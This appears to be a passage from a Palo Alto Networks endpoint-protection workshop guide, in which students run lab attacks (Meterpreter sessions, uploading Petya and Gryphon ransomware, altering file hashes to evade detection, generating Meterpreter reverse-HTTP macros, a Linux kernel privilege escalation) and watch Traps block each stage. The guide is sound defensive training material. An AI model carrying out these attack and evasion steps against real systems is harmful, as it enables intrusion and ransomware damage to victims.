“Retrieve Files”, Initiate Live Terminal”, “Create Exception” and “Isolate Endpoint”
Note: Your Viewer role does not have the ability to perform these actions.
UTD-AEP 3.1 44
Once completed, the Analysis will be finished, and data is available for download.
End of Activity 5
UTD-AEP 3.1 45
Activity 6 - Prevent Malware Attack

• Review Policy Rules and Profiles on Traps management service
• Attempt the ransomware attack from our previous Activity
• Explore the multi-method malware prevention mechanisms of Traps as they prevent the
ransomware attack
Task 1 – Review Policy Rules and Profiles

In this Task, you will review the Profiles assigned to your Traps-Win2 endpoint from the Policy Rules.

Step 2. Review Assigned Profiles

Select the “Endpoints” > “Endpoints” node and click on your traps-win2 (e.g. jdoe-win2) endpoint.
Click the “Policy” tab to view the assigned policies.
UTD-AEP 3.1 46
As can be seen here, the Exploit Profile that is assigned is “no exploit protection” and the Malware Profile is
“allow temp and macro”. There is also a Restriction Profile of “blacklist folder”.
Step 3. Review Policy Rules

Select the “Security” > “Policy Rules” node.
Note that your traps-win2 endpoint belongs to the TrapsWin2group and has the same assigned profiles as
seen in the previous step.

Select the “Security” > “Profiles” node.
Click the “no exploit protection” profile to bring up the details for that rule.
Note that all Exploit Protection Modules have been disabled. This has been done to allow the Attacker system
to deliver the Hacking Team Flash zero-day exploit to your traps-win2 client. As was previously seen with
traps-win1, if exploit protection is in place, the attack will be stopped there. We will be demonstrating malware
protection in this Activity.
UTD-AEP 3.1 47
Click on the “allow temp and macro” profile to bring up the details for that rule.
This profile has default actions for the Malware Protection Module other than a Whitelist File (which will be
used later to demonstrate file and folder restrictions). This profile also has quarantine enabled.
Task 2 - Attempt to Execute Ransomware

In this Task, you will access the Attacker environment, upload the ransomware malware you have used in
previous activities to the Traps-Win2 environment, and attempt to execute the ransomware.

Click the “Traps-Win2” tab to access that desktop. Make sure you are on Traps-Win2 for this Activity.
Click the “Check In Now” link to reconnect to the Traps management service and retrieve any updated
security policies.
The link should change momentarily to “Connecting” and once the Traps-Win2 has completed the check-in
process, it should return to “Check In Now.”
The “Anti-Exploit Protection” module should show that it is disabled (due to the “no exploit protection” profile).
Step 2. Access the Spear Phishing Email in Outlook

Click the Outlook icon to launch Outlook.
This Step repeats the same sequence of actions you completed to trigger the exploitation of the Victim VM in
the previous Activity. This is necessary to observe Traps in action.
UTD-AEP 3.1 48
Click the Outlook application window to activate it. The email with the subject line: “Someone has your
password” is displayed in the inbox.
(depending on your network speed), display a webpage that resembles the Google account login website.
Recall from our previous Activity that the Attacker server detects the incoming connection and serves the
SWF file for the Hacking Team zero-day exploit in reply to the request.
At this point, since Traps has the Exploit Protect Module disabled, the exploit will succeed, and the
ransomware attack can continue to its next stage.
Step 3. Verify that Attacker System is Ready

Click the “Attacker” tab to display the Attacker Desktop.
There should be a terminal window already open on the desktop, with Metasploit loaded and displaying
several entries indicating that weaponized SWF files were transmitted to the Traps-Win1 system. These
prompts are the results of your attempt to activate the spear phishing email in the previous Activity.
The last entry in the Metasploit terminal window should indicate that a Meterpreter session was opened to the
Traps-Win2 system.
UTD-AEP 3.1 49
Click inside the terminal window to activate it. Then press the “enter/return” key a few times to get a Metasploit
prompt:
At the Metasploit prompt, type the following command to verify that you have an active Meterpreter session to
the Victim Client system:
sessions
This will display a list of all active sessions currently running within Metasploit.
Note the “ID” of the active session with Traps-Win2. We will use session ID #1 for the instructions below, but
you should use the number that corresponds to your session ID.
Step 4. Initiate an Interactive Session with Traps-Win2

Initiate an interactive session with Traps-Win2 by entering the following command at the Metasploit prompt
(assuming your session ID is 1):
sessions -i 1
This will initiate the interactive session, display the message “Starting interaction with 1,” and change the
prompt to a Meterpreter prompt: “meterpreter>”
At this point, you have connected with the Traps Client and can now upload your ransomware sample to that
system.
Step 5. Upload the Ransomware to the Traps Client

The Petya ransomware that is part of this attack sequence already resides on the Attacker machine. Upload it
to the Traps Client by typing the following commands at the Meterpreter prompt:
cd /Windows
upload happy.exe
Traps Client: “uploaded : happy.exe -> happy.exe”
UTD-AEP 3.1 50
We are now ready to launch our ransomware attack and infect Traps-Win2.
Step 6. Execute the Ransomware Malware on Traps-Win2

Enter the following command at the Meterpreter prompt:
At this point, Meterpreter should indicate that a new process was created and executed on the target system,
Traps-Win2.
Step 7. Observe Traps Malware Prevention (WildFire Inspection)
Click the “Traps-Win2” tab. This should display the Traps-Win2 desktop.
At this point, Traps will either have already identified and blocked this malware, or it will be in the process of
doing so. In either case, you should see a Traps Prevention Alert window open on the Traps-Win2 machine.
The “Prevention Description” field should indicate Traps blocked this based on a “Suspicious executable
detected”. Click the “Show Details” button then scroll down to the bottom of the list. You will notice the
“Component” referenced here is “WildFire”
Click “OK” to dismiss the alert window.

Switch over to the Traps console by clicking its icon in the Windows Taskbar. Then click the “Events” tab in
the Traps console window (recall that we displayed this tab by clicking the “Advanced” link adjacent to the
“Status” tab in previously). This will display all recent security events recorded on this system.
Click “Check In Now” to pull the event details from your Traps management service.
Note the first line of this list. It should indicate that Traps blocked “happy.exe” (per WildFire Module) and
terminated the process.
UTD-AEP 3.1 51
Now click the record that corresponds to that security event. This should display additional details about the
security event.
Note that in the “Details” window, it indicates that Traps quarantined the malware (as shown by the entry
“Quarantine: Yes”).
Since this malware has a file hash that is identified as a known malware in the WildFire threat intelligence
cloud (and now in the local cache of this Traps agent and the Traps management service), Traps will block it
every time it attempts to run.
In order to see the local Static Analysis prevention method, we need to create a malware sample with a file
hash that is unknown to both Traps and WildFire.
Task 3 - Create Unknown Malware

In this Task, you will change the file hash of our ransomware sample, “happy.exe” using a command line tool.
This will create a file that is essentially unknown to Traps and WildFire.
Click the “Attacker” tab. This will display the Attacker desktop with a terminal window already open with a
Meterpreter prompt. Since we will use this prompt once again in a few moments, we need to open a new
Terminal window.
Right-click the “Terminal” link on the very top of the Attacker desktop window, then select “New Terminal” from
the drop-down list. This will display a new Terminal window.
In the new Terminal window, type the following command to get a listing of all files in the root directory:
ls
The file “hashchange.sh” will be listed among the files on the root user’s home directory.
In the new Terminal window, type the following command to modify the file hash for the “happy.exe”
ransomware sample:
./hashchange.sh
This will display the 64-character hash value of the file “happy.exe,” add a small segment of random data to
the end of the file and display the new hash value for the modified file. Note the difference between the hash
values before and after the change.
UTD-AEP 3.1 52
This malware file is now essentially unknown to Traps and WildFire because it has a new file hash.
Task 4 - Attempt to Run Ransomware Again

In this Task, you will upload the ransomware malware you created in the previous Task to Traps-Win2
environment and attempt to execute the ransomware.
Step 1. Upload Modified Ransomware to the Traps-Win2

In the Attacker desktop window, click inside the initial terminal window that still displays the Meterpreter
prompt (“meterpreter >”). This window should still be visible under the new Terminal window that you used in
the previous Task to modify the ransomware sample.
Upload the modified ransomware sample you created in the previous Task to the Traps Client by typing the
following commands at the Meterpreter prompt:
upload happy.exe
We are now ready to launch our new ransomware with an unknown file hash to infect the Traps Client.

Traps Client.
Step 3. Observe Traps Malware Prevention (Static Analysis)

doing so. In either case, you should see a Traps Prevention Alert window open on the Traps Client machine.
UTD-AEP 3.1 53
The “Prevention Description” field should again indicate Traps blocked based on a “Suspicious executable
detected”. Click the “Show Details” button then scroll down to the bottom of the list. You will notice the
“Component” referenced here this time is “Local Analysis”

If the Traps console is not visible on the desktop, bring it to the forefront by clicking its icon in the Windows
Taskbar. Then click the “Events” tab in the Traps console window. This will display all recent security events
recorded on this system.
Note the first line of this list. It should indicate that Traps blocked “happy.exe” (per Local Analysis Module) and
terminated the process.
Click “Check In Now” to pull the event from your Traps management service.
security event.
UTD-AEP 3.1 54
Note that the “Details” window indicates that Traps quarantined the malware (as shown by the entry
“Quarantine: Yes”).
Step 4. Review WildFire Malware Security Event on Traps Management Service

Click the “TMS” tab to access that environment. This should display the Traps management service.
Click the “Security” > “Security Events” node. Filter by your endpoint name to show just your events.
Notice that the File “happy.exe” among the first couple of entries in this table, along with the Event and the
Malware Profile Type.
You can see that the older event was block as known “WildFire Malware”. Click the event to bring up more
details.
UTD-AEP 3.1 55
Review the details, including the Module, Endpoint, Process, Files and Users sections. Note, from the Module
section, that the WildFire module blocked the process and quarantined the file.
You can also click on the “WildFire” tab to display the details regarding this already WildFire known sample.
You will see more in the next Step.
Step 5. Review Local Analysis Malware Security Event on Traps Management Service
Click the “Local Analysis Malware” event to bring up more details.
Review the details, including the Module, Endpoint, Process, Files and Users sections. Note, from the Module
section, that the Local Analysis module blocked the process and quarantined the file.
Click the “WildFire” tab. As this sample was previously unknown to WildFire, it was uploaded and analyzed.
Once WildFire has completed this, it will render a verdict and transmit that back to the Traps management
service. That verdict will be visible in this section.
UTD-AEP 3.1 56
Depending on how much time has passed, you may see it analysis still in progress:
When WildFire has completed the analysis, you will see:
You will revisit this event later, if WildFire has not returned a verdict, please proceed to the next task.
UTD-AEP 3.1 57
Task 5 – Attempt to Run Ransomware from Restricted Directory

In this Task, you will attempt to execute the ransomware from a restricted directory

Recall from Task 2 that the Malware Profile assigned is “allow temp and macro”. Your traps-win2 VM was also
assigned the Restriction Profile of “blacklist folder”. You may review these by going to Endpoints > Endpoints
> traps-win2 (e.g. jdoe-win2) > Policy or Security > Policy Rules > TrapsWin2group.
While still in the Traps management service, select the “Security” > “Profiles” node. Select “allow temp and
macro” to bring up the details of that Profile. Scroll down to see the “Whitelist Files” section.
Note that “c:\temp\happy.exe” is being allowed here. This will disable WildFire and Local Analysis protections
and allow your Restriction Profile to be evaluated. If this was not in place, Traps would stop the ransomware
executed from that directory as you experienced in the previous Task.
Again, from the “Profiles” node, select “blacklist folder” to bring up the details for it.
Note that the “Action mode” is set to “Block”. The “Blacklist Files / Folders” is set to “c:\temp\happy.exe”. This
will prevent the execution of happy.exe from “c:\temp\”.
Step 2. Create a Temp Directory on the Traps-Win2

Click the “Attacker” tab to access that desktop window.
Click inside the initial terminal window that still displays the Meterpreter prompt (“meterpreter >”). Next, hit the
“enter/return” key a few times to make sure your session is still active.
Create the new directory “C:\temp” on the Traps Client machine by entering the following commands at the
Meterpreter prompt in sequence (and hitting the “enter/return” key after each command):
UTD-AEP 3.1 58
cd /
mkdir temp
cd temp
Step 3. Upload Modified Ransomware to Traps-Win2

Now upload the modified ransomware sample you created in the previous Task to the Traps-Win2 by typing
the following commands at the Meterpreter prompt:
upload happy.exe
We are now ready to launch our new ransomware with an unknown file hash to infect the Traps-Win2.

Traps-Win2.
Step 5. Observe Traps Malware Prevention (Execution Restrictions)

doing so. In either case, you should see a Traps Prevention Alert window open on the Traps-Win2 machine.
The “Prevention Description” field indicates that Traps blocked an “Attempted execution from a restricted
folder.”
If you recall our review of the Restrictions policy, Traps was programmed to prevent execution of programs
from the “c:\temp” directory. This is precisely what happened in this Step.
If the Traps console is not visible on the desktop, bring it to the forefront by clicking its icon in the Windows
Taskbar. Then click the “Events” tab in the Traps console window.
UTD-AEP 3.1 59
Note the first line of this list. It should indicate that Traps blocked “happy.exe” (per Execution Protection
Module) and terminated the process.
security event.
Note that the “Details” window indicates that Traps did not quarantine the malware (as shown by the entry
“Quarantine: No”), because it was not specifically identified as malware.
Step 6. Clean Up the Environment

Close Internet Explorer, and Outlook by clicking the “X” on the top-right corner of each window.
Click the “Attacker” tab to display that desktop environment.
Next, click inside the Terminal window that should still be displaying the Meterpreter prompt (“meterpreter >”).
Hit the “enter/return” key a few times to display a new prompt. The Meterpreter session should have
automatically terminated (since you shut down Internet Explorer in the Traps Client environment).
At the Metasploit prompt (“msf exploit(adobe_flash_hacking_team_uaf) >”), type the following commands,
hitting the “enter/return” key after each:
exit
clear
UTD-AEP 3.1 60
Step 7. Review Security Event on Traps Management Service

Click the “TMS” tab to access that environment.
Click the “Security” > “Security Events” node. Filter by your endpoint name to show just your events. If you are
still filtering “Severity” for “Medium”, change it to by clicking each of the icons.
Note the most recent event is “Execution From a Restricted Folder”. You may click that event to get further
details.
End of Activity 6
UTD-AEP 3.1 61
Activity 7 - Security Operating Platform in Action

• Learn how the Palo Alto Networks Next-Generation Security Platform automates prevention
• Validate the threat intelligence gained from Traps preventions result in new prevention
capabilities automatically programmed into the firewall
Task 1 - Review the Security Operating Platform

Review the Palo Alto Networks Security Operating Platform with your workshop instructor.
Task 2 - Review Ransomware Attack Progression

In this Task, you will review the threat intelligence that Traps has gathered so far from your actions in previous
Activity tasks.
Step 1. Verify Ransomware Upload to WildFire

In the last set of tasks of the previous Activity, you used a command line tool to modify the ransomware
executable “happy.exe” to create a new malware with a file hash that was unknown to both Traps and
WildFire.
The local Static Analysis check in Traps correctly blocked this newly modified ransomware, quarantined the
file, and transmitted the file to WildFire for full analysis.
UTD-AEP 3.1 62
Click the “TMS” tab to access that desktop environment.

Select the “Security” > “Security Events” node.
Notice “happy.exe” among the first few entries in this table. Click the “Local Analysis Malware” event and then
select the “WildFire” tab.
The Traps management service upload of this malware to WildFire should have been completed at this point,
as indicated by the verdict being present. Note, if you have worked through the tasks quickly, the verdict may
not be available. Please recheck after a couple of minutes.
Step 2. Retrieve WildFire Report

Click the “Download WildFire analysis report (PDF)” button to download the report.
When prompted, confirm that “Open with” is set to “SumatraPDF” and then click “OK”.
The browser will download the report and then open it in the PDF viewer.
Review the WildFire report to learn more about the types of information WildFire reveals through its full
analysis of the ransomware file.
UTD-AEP 3.1 63
When done, exit the application.

The threat intelligence gained through the WildFire analysis will have automatically reprogrammed the Next-
Generation Firewall in the UTD environment to prevent access to the malware file.
Task 3 - Retrieve Ransomware Through Firewall

In this Task, you will retrieve the modified ransomware file through the Next-Generation Firewall that is
deployed in the UTD environment.
Step 1. Transfer Ransomware to Web Server

For this step, we will use the web server that is located on the Attacker system. The Attacker system is
equipped with a separate network interface that is routed through the Next-Generation Firewall, so the firewall
will evaluate and secure any requests directed to the web server through this interface.
Click the “Attacker” tab to display that desktop environment.
Next, click inside either of the terminal windows that are currently open on the Attacker desktop system, and
type the following command to transfer “happy.exe” to the root directory of the web server:
cp happy.exe /var/www/ngfw/
Step 2. Verify Ransomware Transfer to Web Server

Click the “Traps-Win2” tab to display that desktop environment.
Next, launch Internet Explorer by clicking its icon in the Windows Taskbar.
Finally, click the “Web Server” shortcut on the Favorites bar of Internet Explorer to access the root directory of
the web server. This should display the index of the web server files, including “happy.exe.”
UTD-AEP 3.1 64
Step 3. Attempt to Retrieve the Ransomware File

In the list of files from the web server that are displayed in the browser, click the name of our ransomware file,
“happy.exe.”
The browser should now display a message stating that “Virus/Spyware Download Blocked” and identify the
file that you attempted to download, “happy.exe.”
This verifies that when Traps encountered an unknown malware (the modified ransomware) and submitted it
to WildFire for analysis, the threat intelligence gained from that analysis automatically reprogrammed the
Next-Generation Firewall in the UTD environment to block the transfer of the file through the firewall.
Close Internet Explorer by clicking the “X” on the top-right corner of that window. If Outlook is still open, close
it as well.
End of Activity 7
UTD-AEP 3.1 65
Activity 8 – Anti-Ransomware Protection

• Experience a file-based ransomware attack on Victim VM
• Attempt file-based ransomware attack on Traps Client
Task 1 – Review Anti-Ransomware Protection Module

The Anti-Ransomware Protection module provides additional protection against ransomware. The module
targets encryption-based activity associated with ransomware with the ability to analyze and halt ransomware
activity before any data loss occurs.
In a ransomware attack, the attacker typically uses DLLs, macros, shell scripts and other methods to encrypt
important data. The attacker can then hold the data hostage until the user pays a ransom to unlock it. To
combat these attacks, Traps analyzes common ransomware behavior to prevent the ransomware from
encrypting and holding files hostage.
This behavior-based protection is an additional layer of prevention to the pre-existing malware and exploit
prevention capabilities.
Task 2 – Execute Ransomware on Victim

Our previous ransomware attack used Petya which encrypted the MBR (master boot record). In this task, we
will be using the Gryphon ransomware which restricts access to data by encrypting individual files.
Step 1. Access Victim Desktop
Click “Victim Client” tab and switch over to RDP.
Step 2. Exit Outlook Client

Exit the Outlook client by clicking the red “X”.
Step 3. Launch Ransomware

From the “Victim Client” desktop, double-click the “OnlineGames” executable.
UTD-AEP 3.1 66
Step 4. Observe attack

It may take up to 5 minutes for the effects of the attack to become noticeable. Once the Gryphon ransomware
has finished encrypting files, it will launch Notepad with the ransom note.
Notice that even the folder on the desktop has been encrypted. All files encrypted will have the extension
“[chines34@protonmail.ch].gryphon”.
Task 3 – Attempt Execution of Ransomware on Traps Client

Our previous activities have disabled the WildFire protection module which would normally stop this malware
right away. In this task, we will see the Anti-Ransomware module in action.

Select the “Endpoints” > “Endpoints” node, your traps-win1 (e.g. jdoe-win1) endpoint, then click the “Policy”
tab to view the “Assigned Policy”. Alternatively, select “Policy Rules” and view the assigned policies for
“TrapsWin1group”. Note that the Malware Profile is “disable WildFire”.
Select the “Security” > “Profiles” node and click on the “disable WildFire” profile.
UTD-AEP 3.1 67
Note that “Ransomware Protection” is set for the “Action mode” of “Default (Block)”. Also, “Examine Portable
Executables and DLLs” is “Disabled”. This has been done so WildFire does not block the ransomware and
allows the Ransomware Protection Module to execute.
Step 2. Launch Ransomware

From the “Traps-Win1” desktop, double-click the “OnlineGames” executable. Make sure you are on Traps-
Win1.
Step 3. Observe Anti-Ransomware Protection

The default Traps policy will stop the ransomware before any files are encrypted.
UTD-AEP 3.1 68
Click “Show Details” to see that the “Anti-Ransomware Protection” module was activated.
Click “OK” to dismiss the Traps dialog box.
Step 4. Verify Prevention in the Event Log

Click the “Events” tab in the Traps console window. This shows that the Anti-Ransomware Protection module
caught the process “OnlineGames.exe” and terminated it.
UTD-AEP 3.1 69

Note the most recent event is “Suspicious File Modification”. You may click that event to get further details.
Notice that a WildFire report is already available. As this file is already known to WildFire and would have
been stopped immediately as known malware. We had previously disabled WildFire so you could see the
multi-layer capabilities that can detect and prevent ransomware launched using malicious executable files.
End of Activity 8
UTD-AEP 3.1 70
Activity 9 – Microsoft Office File Protection

• Block known and unknown malicious macros
Task 1 – Review Microsoft Office File Protection

Traps can block malicious macros that are embedded in Microsoft office documents on Windows endpoints.
By default, Traps automatically blocks malicious macros run from Microsoft Excel and Microsoft Word files and
includes protection of the following file formats:
• Microsoft Office 2003 to Office 2007—doc, xls
• Microsoft Office 2010 and later releases—docm, docx, xlsm, xlsx
Traps evaluates Office macros using the following steps:

1. Traps examines macros in Excel and Word files as they are opened and queries its local cache with
the hash of the macro embedded in each document.
2. If Traps identifies a verdict for a macro (issued either by a previous evaluation via WildFire threat
analysis service or by admin override policy), it allows or blocks the macro according to that verdict.
3. If the macro verdict is unknown locally, Traps queries Traps management service for an official
verdict.
4. If Traps management service has identified the macro as malicious, Traps blocks the macro.
5. If Traps management service does not have a verdict for the macro, it queries WildFire for the verdict
associated with the file containing the macro and optionally submits the file to WildFire for analysis.
6. If the file containing the macro is unknown to WildFire, Traps uses local analysis via machine learning
to issue an immediate verdict and block or allow the macro according to that verdict. WildFire, in turn,
analyzes the unknown macros in the file and renders a verdict.
Task 2 – Prepare Attacker system

In this Task, you will configure the attacker system to set up a reverse HTTP listener to receive a connection
from the successful execution of the malicious Excel macro.
UTD-AEP 3.1 71

Click the “Attacker” tab to access that desktop.
Step 2. Launch the Metasploit Listener

./macro.sh
This will load Metasploit and configure it to listen for incoming HTTP connections from the victim system.
When Metasploit has completed loading, it should display the following prompt
“msf exploit(handler) >”
Task 3 – Attempt Execution of Known Malicious Macro

In this Task, you will attempt to open an Excel file that contains a malicious macro already known to WildFire.

Select the “Endpoints” > “Endpoints” node, your traps-win1 (e.g. jdoe-win1) endpoint, then click the “Policy”
tab to view the “Assigned Policy”. Alternatively, select “Policy Rules” and view the assigned policies for
“TrapsWin1group”. Note that the Malware Profile is “disable WildFire”.
Select the “Security” > “Profiles” node and click on the “disable WildFire” profile.
UTD-AEP 3.1 72
Note that “Examine Office Files with Macros” is set for the “Action mode” of “Default (Block)”.
Step 2. Observe Traps Office Macro Protection (WildFire Inspection)

Next, find the Excel file named “FinancialReport” on the desktop and double-click the file to open it.
This will launch Excel and attempt to open the file. However, Traps will stop the file from opening and display
a dialog box informing you that it has prevented a malicious action.
Click “Show Details” to see that this previously known macro was stopped by WildFire.
UTD-AEP 3.1 73

Close out of Excel by clicking the “X” in the upper right-hand corner of the two pop-up windows and then the
application itself.

Click the “Events” tab in the Traps console window. This shows that WildFire prevented the macro running in
the process “excel.exe” and terminated it.
UTD-AEP 3.1 74

Click the “Security“ > “Security Events” node. Filter by your endpoint name to show just your events.
Note the most recent event is “WildFire Malware” for the file “FinancialReport.xls”. You may click that event to
get further details.
Notice that a WildFire report is already available. This file is already known to WildFire.
WildFire uses the hash of the Office file to identify the malicious macro, not the hash of the macro itself. Traps
tracks the hash of the macro as well as the Office files that have been seen with that macro embedded within
them. This is how the Traps can render an immediate verdict for any Office file that embeds a known macro,
even if the contents of the Office file are changed or if the macro appears in Office files that are completely
different.
Task 4 – Generate Unknown Malicious Macro

In this Task, you will generate a malicious macro, currently unknown to WildFire.

Step 2. Generate Malicious Macro

Find the “GenerateMacro” PowerShell script on the Traps Client desktop.
UTD-AEP 3.1 75
Next, right click the icon and select Run with PowerShell.
Enter a document name of your choosing.
Enter “1” for Meterpreter Shell with Logon Persistence.
Enter “2” for Meterpreter Reverse HTTP.
A new Excel will appear on your desktop with the document name you provided.
Step 3. Observe Traps Office Macro Protection (Static Analysis)

As the PowerShell script is writing out the malicious macro, Traps will detect it and stop it.
Note that it was Local Analysis that prevented the rest of the file from even being generated.

Click the “Events” tab in the Traps console window. This shows that Local Analysis prevented the macro
running in the process “excel.exe” and terminated it.
UTD-AEP 3.1 76

Note the most recent event is “Local Analysis Malware” for the file “badfile.xls” (this will be whatever you
named your file). You may click that event to get further details.
The file was sent to WildFire for further analysis. A verdict will be available when it has completed.
Step 6. Check in on the Attacker

Click the “Attacker” tab to display the Attacker Desktop.
Notice that no active connections have been established. Traps has prevented both known and unknown
malicious macros from compromising our endpoints.
End of Activity 9
UTD-AEP 3.1 77
Activity 10 – Behavioral Threat Protection

• Execute a script-based attack
Task 1 – Review Behavioral Threat Protection

Endpoint attacks often comprise multiple events that occur in the system. By itself, each event appears benign
as attackers leverage legitimate applications and operating system functions to achieve their goal. Strung
together, however, they may represent a malicious event flow. With Behavioral threat protection, Traps
continuously monitors endpoint activity to identify and analyze chains of events—known as causality chains—
rather than a single event. This enables Traps to detect malicious activity in the chain that could otherwise
appear legitimate if inspected individually. A causality chain can include any sequence of network, process,
file, and registry activities on the endpoint.
Palo Alto Networks researchers define the causality chains that are malicious and distribute those chains as
behavioral threat rules. When Traps detects a match to a behavioral threat protection rule, Traps carries out
the configured action (default is Block). In addition, Traps reports the behavior of the entire event chain up to
the process, known as the causality group owner (CGO), that Traps identified as triggering the event
sequence.
Task 2 – Attempt Execution of Script-based Attack

In this Task, you will execute a script-based attack that uses known/benign system utilities in an attempt to
avoid detection.

Step 2. Observe Traps Behavioral Threat Protection

Find the file named “ScriptAttack” on the desktop and double-click it to open the file.
UTD-AEP 3.1 78
Traps will stop the script-based attack from running due to a “Behavioral threat detected”
Click “Show details” and scroll down to see that the file attempted to launch the process “wscript.exe.” The
Behavioral Threat Protection component of Traps stopped its execution.

Click the “Events” tab in the Traps console window. This shows that Behavioral Threat Protection prevented
the file from running in the process ”wscript.exe” and terminated it.
UTD-AEP 3.1 79

Note the most recent event is “Behavioral Threat”. Click that event to get further details.
Note that the prevention module was Behavioral Threat Prevention and the causality group owner (CGO) is
wscript.exe.
Additional data will come in via Cortex Data Lake (previously known as Logging Service). This may take a little
time, but the event will be populated with additional data. Once this done, you may scroll down to see this
information. In order to save time, you may find a previously executed Behavioral Threat event to see this
additional data.
UTD-AEP 3.1 80
Note that four processes are being executed in this script-based attack – wscript.exe, powershell.exe,
mshta.exe and reg.exe. All are known system utilities.
Click the “Analysis” tab (this will also populate after the additional data is pulled in). You will see a timeline of
the behaviors observed with the execution of the script.
End of Activity 10
UTD-AEP 3.1 81
Activity 11 – Traps on Linux

• Execute a kernel privilege escalation on Linux
• Install Traps agent on Linux
• Attempt same kernel privilege escalation against Traps
• Review Traps management service
Task 1 – Execute Kernel Privilege Escalation on Linux

You will run an executable that will use a kernel privilege escalation to get root.
Step 1. Access Linux Client
Click the “Traps-Linux” tab to access the Ubuntu Linux VM. You should already be logged in and at the
console. If you need to log in, use the credentials ubuntu / Password1!
Step 2. Determine Current User

From the CLI, type “whoami” to determine the current user.
As can be seen, you are logged in as the user “ubuntu”.
Step 3. Execute Kernel Privilege Escalation

From the CLI, type “./kpe_exploit1” to run the file that contains the kernel privilege escalation.
UTD-AEP 3.1 82

You are now “root”, the privilege escalation has succeeded.
Step 5. Return to User “ubuntu”

From the CLI, type “exit” to close the root shell and return to your normal user account.
Task 2 – Install Traps on Traps-Linux

In this Task, you will install the Traps Agent on the Traps-Linux environment and verify that Traps is running.

From the CLI, type “sudo sh ./traps_installer.sh” and enter the password of “Password1!” if prompted.
UTD-AEP 3.1 83
Once the install script completes, you will see the shell prompt again.
Step 2. Confirm Traps Agent Running

Type “sudo /opt/traps/bin/cytool runtime query” to confirm the Traps processes are running.
Task 3 – Attempt Execution of Kernel Privilege Escalation on Linux with

Traps Agent
You will once again execute the kernel privilege escalation.
As can be seen, you are logged in as the user “ubuntu”.
UTD-AEP 3.1 84
Step 2. Execute Kernel Privilege Escalation

From the CLI, type “./kpe_exploit1” to run the file that contains the kernel privilege escalation.
This time, the escalation attempt was prevented by Traps.
Step 3. Confirm Current User

You are still the user “ubuntu”, confirming that the privilege escalation did not succeed.

Note the most recent event is “Kernel Privilege Escalation”. You may click that event to get further details.
UTD-AEP 3.1 85
Step 5. Uninstall Traps Agent

Type “sudo /opt/traps/scripts/uninstall.sh” to uninstall the Traps Agent from your VM. When prompted, type “y”
to confirm.
End of Activity 11
UTD-AEP 3.1 86
Activity 12 - Complete the UTD Evaluation
Thank you for attending the Ultimate Test Drive event. We hope that you found the presentation and lab
activities enjoyable and informative.
In this Activity, we ask that you complete a short evaluation/survey to share your thoughts about this UTD.
We need and appreciate your guidance and advice.
Step 1. Complete a Brief Survey
In your browser, click the “Survey” tab among the list of the available desktop environments for the UTD.
Follow the on-screen instructions to complete the survey and submit your results.
End of Activity 12
UTD-AEP 3.1 87

UTD-Advanced-Endpoint-Workshop Guide-3.1-20190822 PDF

Caricato da

Informazioni sul documento

Titolo originale

Copyright

Formati disponibili

Condividi questo documento

Condividi o incorpora il documento

Opzioni di condivisione

Hai trovato utile questo documento?

Questo contenuto è inappropriato?

Copyright:

Formati disponibili

UTD-Advanced-Endpoint-Workshop Guide-3.1-20190822 PDF

Caricato da

Copyright:

Formati disponibili

Ultimate Test Drive - Advanced Endpoint Protection

Activity 1 - Initiate the UTD Workshop 5

Activity 2 - Conduct a Ransomware Attack 14

Activity 3 – Install Traps Agents 24

Activity 4 - Explore the Traps Management Service 27

Activity 5 - Prevent Exploit Attack 39

Activity 6 - Prevent Malware Attack 46

Activity 7 - Security Operating Platform in Action 62

Activity 8 – Anti-Ransomware Protection 66

Activity 9 – Microsoft Office File Protection 71

Activity 10 – Behavioral Threat Protection 78

Activity 11 – Traps on Linux 82

Activity 12 - Complete the UTD Evaluation 87

How to use this guide

Activity 1 - Initiate the UTD Workshop

Task 1 – Log in to Your UTD Class Environment

Step 2: Navigate to Class URL

Enter your email address and the Passphrase.

Step 3: Log in to the UTD Environment

Step 4: Enter the UTD Environment

Task 2 - Understand the UTD Environment Setup

Task 3 - Adjust Display as Necessary

Step 1. Access the Traps-Win1 Desktop

Step 2. Modify Screen Dimensions

Task 4 – Enabling the Firewall

Step 2. Log in to the Firewall Interface

Step 3. Enable Firewall Interface “ethernet1/1”

Click “Commit” in the upper right-hand corner of the dashboard.

Step 4. Verify Internet Connectivity

Task 5 – Rename Traps Client VMs

Step 1. Access the Traps-Win1 Desktop

Step 2. Rename Traps-Win1

Step 3. Access the Traps-Win2 Desktop

Step 4. Rename Traps-Win2

Step 5. Access the Traps-Linux Console

Step 6. Rename Traps-Linux

Activity 2 - Conduct a Ransomware Attack

In this Activity, you will:

Task 1 - Understand the Attack Sequence

Task 2 - Prepare the Drive-By Download

Step 1. Access the Attacker Desktop

Step 2. Launch the Metasploit Listener

Task 3 - Activate the Spear Phishing Email

Step 1. Access the Victim Desktop

Step 2. Launch Outlook and Access the Spear Phishing Email

At this point, the attacker has already compromised the endpoint.

Task 4 - Upload the Ransomware to Victim VM

Step 1. Access the Attacker Desktop

Step 2. Verify Open Session to Victim

Step 3. Initiate an Interactive Session with the Victim

Step 4. Upload the Ransomware to the Victim

Task 5 - Run Ransomware Malware on Victim

Step 1. Execute the Ransomware Malware on the Victim Machine

Step 2. Witness the Ransomware Infect the Victim Machine

Congratulations! You are simultaneously an attacker and your own victim.

Step 3. Close the Attacker Session

Task 6 – Revert Victim VM

Step 1. Access the Virtual Machine List

This page will show all the available VMs.

Step 2. Revert Victim Client

Please continue to the next Activity while this process is happening.

Activity 3 – Install Traps Agents

In this activity, you will: